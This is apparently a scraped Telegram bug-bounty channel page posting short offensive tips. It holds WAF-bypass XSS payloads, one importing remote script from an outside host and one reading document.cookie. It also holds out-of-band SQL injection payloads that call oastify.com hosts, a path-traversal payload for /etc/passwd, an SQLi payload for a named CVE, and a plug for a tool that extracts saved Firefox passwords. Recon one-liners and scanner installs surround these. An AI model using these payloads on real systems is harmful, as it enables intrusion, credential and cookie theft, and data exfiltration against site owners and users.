NEW BOT Телеграм, страница

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡5🔥4❤3

1.82K views09:41

Waf block any "</"

Try HTML injection </a> worked...

Payload:
</a<noscript>alert(document.cookie</noscript>

#BugBounty #Tips

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤4⚡2🔥2

1.61K views00:02

fuzzuli

💬

fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.

🔼 Installation:
fuzzuli requires go1.17 to install successfully. Run the following command to install.

go install -v github.com/musana/fuzzuli@latest

💻 Example:
All:

echo https://fuzzuli.musana.net|fuzzuli -mt mixed

## OR

fuzzuli -h

😸

Github

⬇️

Download

🔒

BugCod3

#Scanner #Backup #Files

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤7👍3🔥3⚡2

2.07K views01:13

A quick way to find "all" paths for Next.js websites:

console.log(__BUILD_MANIFEST.sortedPages)

👩‍💻 javanoscript:
console.log(__BUILD_MANIFEST.sortedPages.join('\n'));

#BugBounty #Tips #JS

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥8❤3⚡2👍1

1.88K views14:24

Payload:

%2F..%2F..%2Fetc%2Fpasswd

#XSS #Payload

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

👍5❤3⚡2👎2🔥2

1.58K viewsedited 15:36

LazyDork Tool is Google dorker tool help during google dorking link

🔗

Site

#Google #Dork #Maker

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤5⚡5🔥2👌1

1.78K views16:49

XlsNinja: Multi-Vulnerability Scanner

💬

XlsNinja is a powerful and versatile multi-vulnerability scanner designed to detect various web application vulnerabilities, including Local File Inclusion (LFI), Open Redirects (OR), SQL Injection (SQLi), and Cross-Site Scripting (XSS). This tool was created by AnonKryptiQuz, Coffinxp, Hexsh1dow, and Naho.

📊 Features:

⚪️

LFI Scanner: Detect Local File Inclusion vulnerabilities.

⚪️

OR Scanner: Identify Open Redirect vulnerabilities.

⚪️

SQL Scanner: Detect SQL Injection vulnerabilities.

⚪️

XSS Scanner: Identify Cross-Site Scripting vulnerabilities.

⚪️

Multi-threaded scanning: Improved performance through multi-threading.

⚪️

Customizable payloads: Adjust payloads to suit specific targets.

⚪️

Success criteria: Modify success detection criteria for specific use cases.

⚪️

User-friendly command-line interface: Simple and intuitive.

⚪️

Save vulnerable URLs: Option to save the results of vulnerable URLs to a file.

🔼 Installation:

cd lostools
pip install -r requirements.txt
python xlsniNja.py

😸

Github

⬇️

Download

🔒

BugCod3

#Multi #Vulnerability #Scanner

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥5❤4⚡4👍4

2.16K views12:03

Top 15 Vulnerability Scanners🔍

📝

#Top #Vulnerability #Scanners

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤5⚡2🔥2

2.35K views14:36

XSS Bypass Akamai, Imperva and CloudFlare

Payload:
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>

#XSS #Payload

➖

➖
📣 T.me/BugCod3
📣 T.me/Root_Exploit

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥6⚡3❤2👍2🌚2

2.28K views14:46

Add to your wordlist:

auth/jwt/register
auth-demo/register/classic
auth-demo/register/modern

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

❤5⚡3🔥3👍1

1.86K views17:51

WAF AKAMAI Bypass
Lead to 30 XSS in large BBP🤯

"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">

#BugBounty #Tips #Waf
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

❤5🔥5⚡3👍1

2.1K views16:50

Out-of-Band SQL Injection

Payload:

'11111111111' AND (SELECT LOAD_FILE('\\\\http://xde3imh45q8x9o4ovz1kea6cd3ju7kv9.oastify.com\\a'))

'11111111111' AND (SELECT CONCAT('', (SELECT SLEEP(5)), (SELECT LOAD_FILE(CONCAT('\\\\', (SELECT 'http://14379q88wuz10svsm3so5exg47ayyqmf.oastify.com/a'))))))

#BugBounty #Tips #SQL
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

❤3👍3🔥2⚡1

2.24K views18:52

Extract all endpoints from a JS File and take your bug 🐞

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🔥5❤4👍3⚡1

2.42K views16:50

Firefox Decrypt

💬
Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox™, Waterfox™, Thunderbird®, SeaMonkey®) profiles

💻 Usage:

cd firefox_decrypt
python firefox_decrypt.py

Github

⬇️ Download
🔒 BugCod3

#Python #Firefox #Extract #Password #Tools
➖➖➖➖➖➖➖➖➖➖
📣 T.me/Root_Exploit
📣 T.me/BugCod3

⚡4❤3🔥3

2.44K views10:52

Finding Hidden Parameter & Potential XSS with Arjun + KXSS

arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/Root_Exploit
📣 T.me/BugCod3

❤3⚡2🔥2

2.58K views12:03

SQLI Injection
CVE: 2024-36837

Payload:

0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334

#BugBounty #Tips

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤2⚡2🔥2

1.95K views12:03

JS Recon for IP, Hostname, URL from Waybackurls + LazyEgg

waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg[.]py "{}" --js_urls --domains --ips' > jsurls && cat jsurls | grep '\.' | sort -u

#BugBounty #Tips

➖

👤

📣